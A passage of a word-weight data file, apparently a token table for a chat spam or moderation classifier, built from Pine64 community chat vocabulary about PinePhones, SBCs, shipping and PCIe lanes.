[38815, 26720], "would": [58374, 7161], "really": [33223, 32312], "love": [52338, 13197], "to": [35814, 29721], "build": [65535, 0], "one": [54171, 11364], "with": [32371, 33164], "night": [65535, 0], "vision": [65535, 0], "heat": [65535, 0], "sensor": [65535, 0], "wildlife": [65535, 0], "detection": [65535, 0], "avoidance": [65535, 0], "kangaroos": [65535, 0], "deer": [65535, 0], "wombats": [65535, 0], "echidnas": [65535, 0], "foxes": [65535, 0], "etc": [34993, 30542], "everywhere": [20045, 45490], "yes": [65535, 0], "that": [48655, 16880], "what": [44985, 20550], "meant": [65535, 0], "seems": [60081, 5454], "have": [43011, 22524], "all": [36097, 29438], "the": [42151, 23384], "different": [39757, 25778], "parts": [65535, 0], "already": [55113, 10422], "ayaay": [65535, 0], "nice": [65535, 0], "https": [20385, 45150], "matrix": [65535, 0], "org": [50312, 15223], "media": [65535, 0], "v": [41494, 24041], "download": [51053, 14482], "nwkxodnaknswfzwbqggezniq": [65535, 0], "wat": [65535, 0], "mbohun": [65535, 0], "was": [39400, 26135], "thinking": [65535, 0], "about": [37642, 27893], "this": [34517, 31018], "longer": [65535, 0], "time": [39434, 26101], "tell": [38763, 26772], "us": [30700, 34835], "your": [26364, 39171], "thoughts": [65535, 0], "it": [50014, 15521], "should": [57395, 8140], "be": [42504, 23031], "possible": [42723, 22812], "do": [48892, 16643], "allwinner": [65535, 0], "s": [48892, 16643], "which": [51936, 13599], "currently": [49491, 16044], "used": [55113, 10422], "in": [39334, 26201], "pinecube": [65535, 0], "that's": [58287, 7248], "even": [48078, 17457], "an": [35494, 30041], "esp": [65535, 0], "or": [50339, 15196], "but": [50955, 14580], "low": [27099, 38436], "fps": [65535, 0], "no": [40725, 24810], "arch": [65535, 0], "frajer": [65535, 0], "sa": [65535, 0], "frizurom": [65535, 0], "tbh": [65535, 0], "idea": [59144, 6391], "order": [65535, 0], "got": [31482, 34053], "second": [51053, 14482], "hand": [65535, 0], "pinephone": [65535, 0], "here": [40941, 24594], "maybe": [65535, 0], "pinebook": [58857, 6678], "pro": [61318, 4217], "uni": [65535, 0], "phone": [52680, 12855], "shipping": [65535, 0], "available": [40828, 24707], "india": [65535, 0], "lol": [61377, 4158], "ok": [65535, 0], "then": [58857, 6678], "p": [46990, 18545], "protocolbot": [65535, 0], "t": [16067, 49468], "rahulraj": [65535, 0], "don't": [42970, 22565], "think": [60366, 5169], "so": [39984, 25551], "because": [36439, 29096], "of": [33212, 32323], "some": [51618, 13917], "customs": [65535, 0], "law": [65535, 0], "are": [40091, 25444], "you": [36868, 28667], "going": [35828, 29707], "fer": [65535, 0], "too": [50225, 15310], "perchance": [65535, 0], "nah": [65535, 0], "they": [47789, 17746], "ship": [65535, 0], "mind": [50312, 15223], "discord": [65535, 0], "replies": [65535, 0], "not": [54125, 11410], "supported": [65535, 0], "by": [34247, 31288], "bridge": [65535, 0], "wont": [52338, 13197], "use": [53190, 12345], "hi": [34569, 30966], "how": [41701, 23834], "may": [65535, 0], "get": [40704, 24831], "my": [28432, 37103], "status": [57166, 8369], "last": [37311, 28224], "alternative": [65535, 0], "know": [48350, 17185], "if": [45810, 19725], "shipped": [65535, 0], "two": [49912, 15623], "emails": [65535, 0], "confirmation": [65535, 0], "and": [32753, 32782], "later": [45624, 19911], "on": [37960, 27575], "tracking": [65535, 0], "number": [65535, 0], "haven't": [51725, 13810], "received": [10936, 54599], "email": [65535, 0], "hasn't": [65535, 0], "yet": [60274, 5261], "i'm": [39103, 26432], "city": [65535, 0], "virtually": [65535, 0], "same": [58198, 7337], "course": [65535, 0], "kewl": [65535, 0], "guys": [17081, 48454], "question": [65535, 0], "spit": [65535, 0], "out": [41239, 24296], "ordered": [65535, 0], "x": [45535, 20000], "pinetime": [65535, 0], "can": [38137, 27398], "find": [65535, 0], "when": [43565, 21970], "will": [41165, 24370], "at": [41921, 23614], "address": [43565, 21970], "date": [35405, 30130], "field": [65535, 0], "site": [65535, 0], "working": [54327, 11208], "could": [56394, 9141], "only": [52467, 13068], "individually": [65535, 0], "without": [32009, 33526], "both": [56394, 9141], "orders": [65535, 0], "mail": [65535, 0], "once": [54327, 11208], "ships": [65535, 0], "asking": [51053, 14482], "long": [43011, 22524], "roughly": [65535, 0], "take": [43795, 21740], "flight": [65535, 0], "th": [47550, 17985], "next": [57395, 8140], "month": [43011, 22524], "has": [33421, 32114], "catch": [65535, 0], "up": [42090, 23445], "we": [40828, 24707], "say": [41464, 24071], "from": [25808, 39727], "today": [24460, 41075], "until": [29943, 35592], "october": [65535, 0], "china": [65535, 0], "usually": [65535, 0], "pre": [65535, 0], "depending": [45076, 20459], "location": [65535, 0], "pennsylvania": [65535, 0], "also": [54790, 10745], "depends": [65535, 0], "method": [30700, 34835], "courier": [65535, 0], "slow": [65535, 0], "takes": [65535, 0], "america": [65535, 0], "days": [33609, 31926], "like": [50483, 15052], "said": [46143, 19392], "it's": [48039, 17496], "methods": [65535, 0], "omg": [20045, 45490], "thanks": [33313, 32222], "man": [29943, 35592], "thats": [65535, 0], "bad": [65535, 0], "me": [23428, 42107], "want": [36598, 28937], "leave": [34352, 31183], "usa": [41813, 23722], "turkey": [65535, 0], "well": [46795, 18740], "did": [46255, 19280], "standard": [65535, 0], "done": [41813, 23722], "looking": [51936, 13599], "fastest": [65535, 0], "way": [43744, 21791], "fast": [32259, 33276], "twice": [35405, 30130], "unlucky": [65535, 0], "timing": [65535, 0], "might": [56394, 9141], "reach": [28988, 36547], "cdn": [65535, 0], "discordapp": [65535, 0], "com": [37086, 28449], "attachments": [65535, 0], "webm": [65535, 0], "firetwoonenine": [65535, 0], "custom": [65535, 0], "gpu": [65535, 0], "chip": [65535, 0], "built": [65535, 0], "into": [31883, 33652], "as": [40316, 25219], "cpu": [43565, 21970], "pizzamartijn": [65535, 0], "guess": [47550, 17985], "good": [33820, 31715], "more": [33998, 31537], "boards": [65535, 0], "buy": [23958, 41577], "don": [26080, 39455], "any": [45076, 20459], "sbcs": [65535, 0], "excluding": [65535, 0], "these": [51330, 14205], "won": [65535, 0], "quartz": [65535, 0], "waiting": [38056, 27479], "mature": [65535, 0], "mostly": [53414, 12121], "usb": [65535, 0], "issue": [55795, 9740], "far": [45471, 20064], "leaves": [65535, 0], "rockpro": [65535, 0], "rock": [65535, 0], "starting": [54327, 11208], "show": [52899, 12636], "its": [49491, 16044], "age": [65535, 0], "anyways": [65535, 0], "gamelaster": [65535, 0], "banner": [65535, 0], "having": [49491, 16044], "devzone": [65535, 0], "public": [58198, 7337], "everything": [32627, 32908], "eeh": [65535, 0], "keep": [37311, 28224], "down": [48892, 16643], "nothing": [58857, 6678], "surely": [65535, 0], "anything": [44498, 21037], "wiki": [65535, 0], "instead": [43565, 21970], "exactly": [39757, 25778], "true": [37311, 28224], "stuff": [65535, 0], "shows": [47550, 17985], "before": [55113, 10422], "announced": [65535, 0], "yup": [65535, 0], "channels": [65535, 0], "ofcourse": [65535, 0], "open": [37837, 27698], "why": [55113, 10422], "needs": [59144, 6391], "exist": [65535, 0], "developments": [65535, 0], "away": [52338, 13197], "seem": [65535, 0], "things": [54327, 11208], "were": [55113, 10422], "isn't": [65535, 0], "much": [31716, 33819], "reason": [52338, 13197], "development": [65535, 0], "work": [40227, 25308], "current": [29285, 36250], "devices": [65535, 0], "happen": [39757, 25778], "mailing": [65535, 0], "lists": [65535, 0], "better": [43011, 22524], "platforms": [37311, 28224], "there's": [65535, 0], "intention": [65535, 0], "being": [55465, 10070], "active": [39757, 25778], "go": [31174, 34361], "projects": [65535, 0], "listed": [65535, 0], "happened": [65535, 0], "them": [38343, 27192], "just": [38354, 27181], "neat": [65535, 0], "track": [65535, 0], "who": [20731, 44804], "devkits": [65535, 0], "replacing": [65535, 0], "obviously": [65535, 0], "benefit": [20045, 45490], "gatekeeping": [65535, 0], "efforts": [22252, 43283], "kinda": [65535, 0], "defeat": [65535, 0], "purpose": [65535, 0], "best": [20684, 44851], "knowledge": [41813, 23722], "something": [58075, 7460], "anyone": [41031, 24504], "ever": [30061, 35474], "planned": [65535, 0], "usecase": [65535, 0], "reasons": [45076, 20459], "you've": [34352, 31183], "stated": [65535, 0], "dumb": [65535, 0], "bucket": [65535, 0], "where": [47856, 17679], "small": [48576, 16959], "features": [65535, 0], "thrown": [65535, 0], "needed": [41813, 23722], "organizing": [65535, 0], "developer": [65535, 0], "signup": [65535, 0], "timeline": [65535, 0], "ie": [37311, 28224], "people": [30426, 35109], "sent": [21489, 44046], "purposes": [65535, 0], "definetly": [65535, 0], "plenty": [65535, 0], "publicly": [65535, 0], "list": [65535, 0], "gdpr": [65535, 0], "protected": [65535, 0], "contact": [12376, 53159], "info": [45076, 20459], "developers": [37311, 28224], "exciting": [30700, 34835], "products": [65535, 0], "d": [42482, 23053], "sbc": [65535, 0], "although": [55113, 10422], "still": [48180, 17355], "trying": [47105, 18430], "figure": [65535, 0], "whether": [65535, 0], "i'll": [61545, 3990], "probably": [65535, 0], "novelty": [65535, 0], "risc": [65535, 0], "softcore": [65535, 0], "most": [45850, 19685], "split": [65535, 0], "over": [43712, 21823], "chats": [65535, 0], "bridging": [65535, 0], "devs": [65535, 0], "talk": [30700, 34835], "together": [30700, 34835], "lot": [44759, 20776], "happens": [30700, 34835], "distribution": [65535, 0], "specific": [65535, 0], "chat": [38590, 26945], "huge": [23277, 42258], "fan": [65535, 0], "gated": [65535, 0], "behind": [65535, 0], "understanding": [65535, 0], "primarily": [65535, 0], "can't": [41813, 23722], "shared": [65535, 0], "legal": [65535, 0], "other": [53213, 12322], "talks": [65535, 0], "refer": [30700, 34835], "outside": [65535, 0], "mm": [65535, 0], "we'll": [65535, 0], "see": [43011, 22524], "hoping": [65535, 0], "signing": [30700, 34835], "dev": [65535, 0], "decision": [22668, 42867], "publicise": [65535, 0], "made": [28643, 36892], "policy": [37311, 28224], "battle": [65535, 0], "been": [30881, 34654], "lost": [30700, 34835], "works": [42547, 22988], "their": [43565, 21970], "heh": [65535, 0], "doesn't": [57243, 8292], "credit": [65535, 0], "start": [22861, 42674], "company": [9051, 56484], "now": [34078, 31457], "apologize": [65535, 0], "teams": [65535, 0], "pr": [65535, 0], "nightmare": [65535, 0], "express": [20045, 45490], "gratitude": [65535, 0], "fact": [65535, 0], "didn't": [45624, 19911], "permaban": [65535, 0], "moment": [49491, 16044], "walked": [65535, 0], "plans": [27750, 37785], "arm": [58543, 6992], "license": [65535, 0], "legitimate": [8393, 57142], "cores": [65535, 0], "rockchip": [65535, 0], "anymore": [41813, 23722], "account": [28643, 36892], "recent": [37311, 28224], "shenanigans": [65535, 0], "english": [65535, 0], "international": [65535, 0], "language": [65535, 0], "business": [30700, 34835], "e": [33223, 32312], "productivity": [65535, 0], "doesn": [65535, 0], "learn": [65535, 0], "culturalist": [65535, 0], "racist": [65535, 0], "re": [39959, 25576], "kirfkin": [65535, 0], "world": [17858, 47677], "everyone's": [65535, 0], "first": [21815, 43720], "politics": [65535, 0], "funeral": [65535, 0], "need": [48576, 16959], "political": [65535, 0], "words": [20045, 45490], "favourite": [65535, 0], "foreign": [65535, 0], "languages": [65535, 0], "try": [34574, 30961], "communicate": [65535, 0], "important": [41813, 23722], "collaborate": [65535, 0], "cultures": [65535, 0], "ericglivingston": [65535, 0], "eric": [65535, 0], "deserve": [30700, 34835], "become": [39757, 25778], "meme": [65535, 0], "eh": [65535, 0], "please": [39379, 26156], "highly": [17081, 48454], "recommend": [31828, 33707], "deepen": [65535, 0], "topic": [65535, 0], "lodge": [65535, 0], "ticket": [65535, 0], "support": [32627, 32908], "does": [54863, 10672], "bash": [65535, 0], "populating": [65535, 0], "variable": [65535, 0], "background": [65535, 0], "thread": [65535, 0], "script": [65535, 0], "complete": [37311, 28224], "using": [46873, 18662], "offtopic": [65535, 0], "alright": [65535, 0], "ty": [30700, 34835], "np": [11832, 53703], "closed": [65535, 0], "room": [43565, 21970], "supersedes": [65535, 0], "general": [51053, 14482], "space": [52338, 13197], "sopine": [65535, 0], "lts": [65535, 0], "actual": [65535, 0], "scrolls": [65535, 0], "messages": [65535, 0], "lmao": [65535, 0], "wtf": [65535, 0], "baby": [65535, 0], "dsimic": [65535, 0], "making": [31037, 34498], "niche": [65535, 0], "network's": [65535, 0], "getting": [46907, 18628], "unwieldy": [65535, 0], "manage": [45076, 20459], "cool": [48576, 16959], "powerful": [65535, 0], "workstation": [65535, 0], "developed": [65535, 0], "hello": [33985, 31550], "help": [29562, 35973], "smartwatch": [65535, 0], "related": [65535, 0], "questions": [65535, 0], "correct": [65535, 0], "forum": [65535, 0], "ha": [16279, 49256], "y": [15853, 49682], "iphone": [10411, 55124], "home": [28534, 37001], "amazon": [65535, 0], "gps": [65535, 0], "am": [31975, 33560], "locked": [65535, 0], "via": [26385, 39150], "update": [65535, 0], "ios": [65535, 0], "moon": [65535, 0], "h": [45973, 19562], "fuck": [65535, 0], "kina": [65535, 0], "bull": [11832, 53703], "makes": [65535, 0], "microsd": [65535, 0], "ssds": [65535, 0], "impressive": [65535, 0], "performance": [65535, 0], "bpfilter": [65535, 0], "image": [60454, 5081], "png": [65535, 0], "minimum": [22252, 43283], "gbps": [65535, 0], "ethernet": [65535, 0], "connection": [65535, 0], "c": [43775, 21760], "assume": [65535, 0], "cone": [65535, 0], "come": [34993, 30542], "it'd": [65535, 0], "cheaper": [65535, 0], "adapters": [65535, 0], "sadly": [65535, 0], "thunderbolt": [65535, 0], "iirc": [65535, 0], "thought": [41331, 24204], "abandoned": [65535, 0], "buongiorno": [65535, 0], "sono": [65535, 0], "interessato": [65535, 0], "all'acquisto": [65535, 0], "del": [20045, 45490], "pinenote": [65535, 0], "residente": [65535, 0], "italia": [65535, 0], "ma": [65535, 0], "sul": [65535, 0], "sito": [65535, 0], "www": [55233, 10302], "non": [55113, 10422], "si": [4484, 61051], "puo'": [65535, 0], "accedere": [65535, 0], "alla": [65535, 0], "procedura": [65535, 0], "di": [65535, 0], "acqisto": [65535, 0], "c'\u00e8": [65535, 0], "una": [6503, 59032], "alternativa": [20045, 45490], "grazie": [65535, 0], "hey": [46393, 19142], "discussion": [65535, 0], "easier": [47550, 17985], "moderate": [65535, 0], "you're": [43565, 21970], "likely": [65535, 0], "response": [65535, 0], "purchase": [65535, 0], "it'll": [65535, 0], "soon": [51053, 14482], "unit": [65535, 0], "though": [61195, 4340], "m": [19164, 46371], "key": [37311, 28224], "absolutely": [65535, 0], "solder": [65535, 0], "wires": [65535, 0], "sdio": [65535, 0], "uart": [65535, 0], "connections": [65535, 0], "wifi": [65535, 0], "module": [65535, 0], "elsewhere": [65535, 0], "while": [30148, 35387], "leaving": [41813, 23722], "pcie": [65535, 0], "multiphy": [65535, 0], "place": [65535, 0], "ssd": [65535, 0], "slot": [65535, 0], "inside": [65535, 0], "laptop": [65535, 0], "thing": [61649, 3886], "storage": [65535, 0], "litefury": [65535, 0], "clear": [65535, 0], "agree": [52338, 13197], "add": [65535, 0], "imagine": [27099, 38436], "bottleneck": [65535, 0], "factor": [65535, 0], "ann": [65535, 0], "rtx": [65535, 0], "connected": [51725, 13810], "rk": [60622, 4913], "based": [49491, 16044], "beauty": [65535, 0], "big": [35905, 29630], "controller": [65535, 0], "plays": [65535, 0], "gpus": [65535, 0], "literally": [65535, 0], "couldn't": [65535, 0], "theory": [65535, 0], "nobody": [65535, 0], "nvme": [65535, 0], "bah": [65535, 0], "mixing": [65535, 0], "those": [41464, 24071], "framebuffer": [65535, 0], "blitter": [65535, 0], "units": [65535, 0], "output": [65535, 0], "vga": [65535, 0], "super": [51725, 13810], "useful": [45076, 20459], "thanos": [65535, 0], "tank": [41813, 23722], "engine": [65535, 0], "sometimes": [53414, 12121], "machine": [65535, 0], "coffee": [65535, 0], "shop": [65535, 0], "yeah": [62690, 2845], "disappear": [65535, 0], "few": [38453, 27082], "months": [15549, 49986], "after": [30700, 34835], "i've": [49681, 15854], "gone": [20045, 45490], "kind": [65535, 0], "online": [16949, 48586], "finish": [65535, 0], "crazy": [51053, 14482], "project": [22798, 42737], "make": [29439, 36096], "blog": [65535, 0], "post": [24254, 41281], "setup": [65535, 0], "thinkpad": [65535, 0], "external": [65535, 0], "rx": [65535, 0], "cheer": [65535, 0], "segfault": [65535, 0], "o": [15512, 50023], "sets": [37311, 28224], "table": [65535, 0], "pulls": [65535, 0], "egpu": [65535, 0], "bag": [65535, 0], "floor": [65535, 0], "plugging": [65535, 0], "nearest": [65535, 0], "outlet": [65535, 0], "lights": [65535, 0], "dim": [65535, 0], "sheer": [65535, 0], "power": [65535, 0], "rig": [65535, 0], "building": [65535, 0], "handle": [65535, 0], "peasants": [65535, 0], "staring": [65535, 0], "jealous": [65535, 0], "took": [43565, 21970], "lan": [65535, 0], "party": [65535, 0], "decent": [65535, 0], "becomes": [30700, 34835], "bring": [20045, 45490], "training": [65535, 0], "ai": [65535, 0], "raising": [65535, 0], "temperature": [65535, 0], "noticeably": [65535, 0], "throwing": [65535, 0], "dirty": [65535, 0], "looks": [54534, 11001], "they're": [53414, 12121], "tempted": [65535, 0], "flow": [65535, 0], "concept": [65535, 0], "extreme": [65535, 0], "ultrabook": [65535, 0], "ish": [65535, 0], "device": [57817, 7718], "ungodly": [65535, 0], "expensive": [65535, 0], "clearly": [65535, 0], "target": [65535, 0], "market": [7328, 58207], "oh": [61435, 4100], "mean": [65535, 0], "extend": [65535, 0], "internally": [65535, 0], "substantially": [65535, 0], "engineered": [65535, 0], "hypothetical": [65535, 0], "future": [39757, 25778], "entire": [30700, 34835], "point": [59144, 6391], "egpus": [65535, 0], "convergence": [65535, 0], "phones": [65535, 0], "own": [45757, 19778], "raid": [65535, 0], "outcome": [65535, 0], "again": [45422, 20113], "pbu": [65535, 0], "weaker": [65535, 0], "imo": [65535, 0], "unless": [65535, 0], "drives": [65535, 0], "opinion": [65535, 0], "cases": [65535, 0], "enabled": [65535, 0], "connectivity": [65535, 0], "outweighs": [65535, 0], "internal": [65535, 0], "cost": [65535, 0], "effective": [65535, 0], "otherwise": [65535, 0], "least": [57817, 7718], "connecting": [65535, 0], "lose": [30700, 34835], "mb": [65535, 0], "slower": [65535, 0], "enough": [58198, 7337], "biggest": [34352, 31183], "hit": [65535, 0], "you'd": [65535, 0], "stuck": [65535, 0], "modules": [65535, 0], "rather": [65535, 0], "than": [39757, 25778], "exhausting": [65535, 0], "cache": [65535, 0], "tradeoff": [65535, 0], "particularly": [65535, 0], "care": [32627, 32908], "faster": [65535, 0], "internet": [65535, 0], "theoretical": [65535, 0], "loss": [20045, 45490], "pbps": [65535, 0], "adequate": [65535, 0], "significant": [65535, 0], "splitting": [65535, 0], "he": [29965, 35570], "lanes": [65535, 0], "fun": [65535, 0], "putting": [41813, 23722], "supports": [65535, 0], "four": [47550, 17985], "pretty": [65535, 0], "limiting": [65535, 0], "quite": [52338, 13197], "bit": [36389, 29146], "speeds": [65535, 0], "gbit": [65535, 0], "drive": [65535, 0], "full": [48078, 17457], "bandwidth": [65535, 0], "i'd": [65535, 0], "surprised": [65535, 0], "interconnect": [65535, 0], "designs": [65535, 0], "able": [48576, 16959], "fdaster": [65535, 0], "redundancy": [65535, 0], "benefits": [65535, 0], "hope": [65535, 0], "sees": [65535, 0], "opportunity": [9051, 56484], "create": [65535, 0], "proof": [25004, 40531], "design": [65535, 0], "gb": [65535, 0], "ram": [65535, 0], "limit": [65535, 0], "iron": [65535, 0], "bottlenecks": [65535, 0], "problem": [49491, 16044], "generation": [65535, 0], "lane": [65535, 0], "bifurcated": [65535, 0], "wouldn't": [41813, 23722], "possibly": [65535, 0], "technically": [65535, 0], "stopping": [65535, 0], "odd": [65535, 0], "numbers": [65535, 0], "theoretically": [65535, 0], "sure": [58703, 6832], "implementation": [30700, 34835], "semantics": [65535, 0], "ah": [65535, 0], "right": [49491, 16044], "double": [47550, 17985], "above": [35693, 29842], "negatory": [65535, 0], "gt": [65535, 0], "almost": [65535, 0], "real": [35259, 30276], "wondering": [51053, 14482], "reconfigure": [65535, 0], "pci": [65535, 0], "port": [65535, 0], "essentially": [65535, 0], "yep": [65535, 0], "part": [38990, 26545], "extra": [35905, 29630], "speed": [27099, 38436], "reducing": [65535, 0], "error": [65535, 0], "correction": [65535, 0], "btw": [65535, 0], "encoding": [65535, 0], "fairly": [65535, 0], "certain": [65535, 0], "weird": [65535, 0], "we're": [45076, 20459], "dreaming": [65535, 0], "framework": [65535, 0], "approach": [65535, 0], "turn": [40828, 24707], "interface": [65535, 0], "component": [65535, 0], "switch": [65535, 0], "wish": [46393, 19142], "talking": [65535, 0], "uses": [65535, 0], "someone": [28412, 37123], "tb": [65535, 0], "mod": [65535, 0], "pbp": [65535, 0], "insanely": [65535, 0], "note": [65535, 0], "sense": [65535, 0], "bait": [65535, 0], "high": [53414, 12121], "networking": [65535, 0], "involve": [65535, 0], "mentioned": [65535, 0], "experiments": [65535, 0], "run": [44239, 21296], "plug": [65535, 0], "box": [65535, 0], "unknown": [5670, 59865], "jpeg": [65535, 0], "he's": [25004, 40531], "nowhere": [65535, 0], "near": [65535, 0], "convenient": [65535, 0], "whole": [24254, 41281], "separate": [65535, 0], "connect": [34993, 30542], "what's": [65535, 0], "sata": [65535, 0], "multiphys": [65535, 0], "beats": [65535, 0], "\u30c4": [65535, 0], "comes": [38590, 26945], "cnx": [65535, 0], "article": [37311, 28224], "riddled": [65535, 0], "errors": [65535, 0], "mistook": [65535, 0], "controllers": [65535, 0], "layout": [65535, 0], "similar": [45076, 20459], "configured": [65535, 0], "rd": [65535, 0], "check": [49137, 16398], "specs": [65535, 0], "nono": [65535, 0], "links": [65535, 0], "assuming": [65535, 0], "eji": [65535, 0], "evk": [65535, 0], "kxx": [65535, 0], "exactdn": [65535, 0], "wp": [65535, 0], "content": [65535, 0], "uploads": [65535, 0], "conference": [65535, 0], "jpg": [65535, 0], "believe": [22060, 43475], "says": [51053, 14482], "three": [65535, 0], "researching": [65535, 0], "saw": [23277, 42258], "tough": [65535, 0], "pricing": [65535, 0], "suppose": [65535, 0], "had": [45576, 19959], "slide": [65535, 0], "since": [40828, 24707], "released": [54327, 11208], "compare": [65535, 0], "ignore": [65535, 0], "diagram": [65535, 0], "sort": [65535, 0], "dc": [6503, 59032], "september": [65535, 0], "sounds": [65535, 0], "hopeful": [65535, 0], "doing": [45757, 19778], "muxes": [65535, 0], "laid": [65535, 0], "single": [49491, 16044], "mux": [65535, 0], "another": [36198, 29337], "compared": [65535, 0], "deleted": [65535, 0], "qsgmii": [65535, 0], "contriller": [65535, 0], "potentially": [65535, 0], "idk": [65535, 0], "interesting": [65535, 0], "ports": [65535, 0], "directly": [35905, 29630], "hardware": [65535, 0], "give": [26982, 38553], "direct": [53414, 12121], "link": [24584, 40951], "every": [38763, 26772], "increasing": [65535, 0], "packet": [65535, 0], "size": [65535, 0], "markedly": [65535, 0], "decrease": [65535, 0], "wonder": [65535, 0], "route": [65535, 0], "mtu": [65535, 0], "packets": [65535, 0], "many": [37311, 28224], "applications": [65535, 0], "maximum": [20045, 45490], "anyway": [65535, 0], "gives": [45076, 20459], "firewalling": [65535, 0], "ability": [65535, 0], "such": [40680, 24855], "finds": [65535, 0], "new": [27022, 38513], "ways": [45076, 20459], "chips": [65535, 0], "versatile": [65535, 0], "end": [43236, 22299], "router": [65535, 0], "minute": [65535, 0], "nas": [65535, 0], "hell": [65535, 0], "hmm": [65535, 0], "let's": [34352, 31183], "let": [50692, 14843], "modify": [65535, 0], "itself": [49491, 16044], "fly": [65535, 0], "android": [65535, 0], "strange": [65535, 0], "channel": [43964, 21571], "avamander": [65535, 0], "admins": [65535, 0], "saifage": [65535, 0], "tried": [54327, 11208], "severe": [65535, 0], "issues": [51053, 14482], "understood": [65535, 0], "provide": [45076, 20459], "riot": [65535, 0], "im": [57817, 7718], "app": [50312, 15223], "main": [55113, 10422], "page": [65535, 0], "thankks": [65535, 0], "told": [43565, 21970], "indian": [20045, 45490], "practically": [65535, 0], "impossible": [65535, 0], "send": [44239, 21296], "option": [36389, 29146], "forwarding": [65535, 0], "service": [65535, 0], "bow": [65535, 0], "accessories": [65535, 0], "weirdly": [65535, 0], "information": [31828, 33707], "rules": [14881, 50654], "specifically": [65535, 0], "anybody": [14881, 50654], "usage": [65535, 0], "universalsuperbox": [65535, 0], "anytime": [65535, 0], "board": [65535, 0], "computer": [43152, 22383], "act": [30700, 34835], "network": [48576, 16959], "proxy": [65535, 0], "dont": [49046, 16489], "belong": [65535, 0], "cuz": [26080, 39455], "tbf": [65535, 0], "choosing": [20045, 45490], "minds": [65535, 0], "sb": [2321, 63214], "wirless": [65535, 0], "case": [57817, 7718], "id": [47550, 17985], "hook": [65535, 0], "dongles": [65535, 0], "itll": [65535, 0], "reverse": [65535, 0], "engineering": [65535, 0], "assu": [65535, 0], "replacement": [65535, 0], "cable": [65535, 0], "barrel": [65535, 0], "fit": [65535, 0], "normal": [65535, 0], "return": [18065, 47470], "potential": [65535, 0], "break": [49491, 16044], "smoke": [65535, 0], "chill": [65535, 0], "everyone": [15941, 49594], "knows": [65535, 0], "delivery": [65535, 0], "europe": [65535, 0], "taking": [28534, 37001], "weeks": [33223, 32312], "reply": [14881, 50654], "didn": [44093, 21442], "couple": [65535, 0], "ago": [53414, 12121], "yesterday": [43565, 21970], "ran": [65535, 0], "message": [45624, 19911], "booting": [65535, 0], "screen": [65535, 0], "turned": [23277, 42258], "off": [59144, 6391], "touch": [65535, 0], "totally": [26080, 39455], "unusable": [65535, 0], "running": [65535, 0], "default": [65535, 0], "os": [47550, 17985], "manjaro": [65535, 0], "play": [65535, 0], "settings": [51053, 14482], "behaviors": [65535, 0], "calling": [65535, 0], "voip": [65535, 0], "riff": [65535, 0], "software": [56923, 8612], "data": [65535, 0], "sim": [65535, 0], "connectiom": [65535, 0], "obv": [65535, 0], "poeples": [65535, 0], "helol": [65535, 0], "ask": [53075, 12460], "linux": [65535, 0], "amlogic": [65535, 0], "basically": [48892, 16643], "sorry": [53414, 12121], "server": [65535, 0], "discussing": [65535, 0], "socs": [65535, 0], "oaky": [65535, 0], "couldn": [37311, 28224], "sxmo": [65535, 0], "found": [48767, 16768], "updates": [65535, 0], "mins": [65535, 0], "phosh": [65535, 0], "min": [41813, 23722], "eufs": [65535, 0], "ac": [65535, 0], "trueee": [65535, 0], "embedded": [65535, 0], "twitter": [37965, 27570], "sephr": [65535, 0], "vivaldi": [65535, 0], "browser": [41813, 23722], "australian": [65535, 0], "very": [40420, 25115], "interested": [21018, 44517], "ordering": [65535, 0], "level": [30700, 34835], "carrier": [65535, 0], "suitability": [65535, 0], "novice": [65535, 0], "group": [23701, 41834], "comments": [65535, 0], "guidance": [20045, 45490], "sincerely": [65535, 0], "welcome": [51053, 14482], "appreciated": [65535, 0], "whats": [65535, 0], "protocol": [65535, 0], "droid": [65535, 0], "bot": [48892, 16643], "telegram": [39186, 26349], "under": [51053, 14482], "impression": [65535, 0], "bridges": [65535, 0], "allow": [28988, 36547], "entirely": [65535, 0], "wrote": [65535, 0], "b": [25502, 40033], "kcm": [65535, 0], "writing": [65535, 0], "bogus": [65535, 0], "config": [65535, 0], "files": [65535, 0], "remove": [65535, 0], "powermanagementrc": [65535, 0], "file": [65535, 0], "through": [27009, 38526], "jumpdrive": [65535, 0], "sd": [65535, 0], "card": [55113, 10422], "pinaperr": [65535, 0], "june": [65535, 0], "plasma": [65535, 0], "mobile": [47550, 17985], "installed": [65535, 0], "everyday": [14881, 50654], "plus": [47550, 17985], "modem": [65535, 0], "dying": [65535, 0], "often": [65535, 0], "hours": [21364, 44171], "however": [65535, 0], "postmarketos": [65535, 0], "edge": [65535, 0], "version": [65535, 0], "always": [42186, 23349], "smile": [11832, 53703], "philpax": [65535, 0], "irc": [65535, 0], "linked": [65535, 0], "invite": [26080, 39455], "individual": [30700, 34835], "spam": [54863, 10672], "voice": [65535, 0], "confirm": [65535, 0], "typing": [65535, 0], "ooooooo": [65535, 0], "latest": [49491, 16044], "ubuntu": [65535, 0], "forgot": [65535, 0], "week": [31427, 34108], "old": [57395, 8140], "ccf": [65535, 0], "mk": [65535, 0], "releases": [65535, 0], "reads": [65535, 0], "product": [65535, 0], "suited": [65535, 0], "folks": [65535, 0], "life": [22817, 42718], "laziness": [65535, 0], "look": [45076, 20459], "yourself": [16728, 48807], "persons": [30700, 34835], "themselves": [65535, 0], "asked": [65535, 0], "free": [38590, 26945], "fitbit": [65535, 0], "user": [46795, 18740], "control": [37311, 28224], "led": [65535, 0], "sensors": [65535, 0], "avilable": [65535, 0], "wearable": [65535, 0], "apps": [65535, 0], "gnu": [65535, 0], "lineageos": [65535, 0], "ben": [30700, 34835], "finney": [65535, 0], "join": [15449, 50086], "our": [23869, 41666], "bug": [20045, 45490], "website": [32627, 32908], "newest": [65535, 0], "redirect": [65535, 0], "intentionally": [65535, 0], "fervi": [65535, 0], "test": [22401, 43134], "pressing": [65535, 0], "f": [23476, 42059], "reload": [65535, 0], "local": [65535, 0], "cause": [45076, 20459], "category": [65535, 0], "computers": [65535, 0], "removed": [65535, 0], "merged": [65535, 0], "organization": [20045, 45490], "click": [13845, 51690], "button": [65535, 0], "store": [65535, 0], "cart": [65535, 0], "empty": [65535, 0], "example": [65535, 0], "source": [56394, 9141], "bugs": [65535, 0], "wordpress": [65535, 0], "enhancing": [65535, 0], "focus": [65535, 0], "magnus": [65535, 0], "distro": [65535, 0], "defoult": [65535, 0], "came": [23701, 41834], "suggest": [65535, 0], "updating": [65535, 0], "terminal": [65535, 0], "pacman": [65535, 0], "discover": [30700, 34835], "packagekit": [65535, 0], "okay": [65535, 0], "thx": [65535, 0], "news": [30700, 34835], "supporting": [65535, 0], "bitcoin": [3580, 61955], "payments": [30700, 34835], "moderator": [65535, 0], "telegram's": [65535, 0], "back": [41126, 24409], 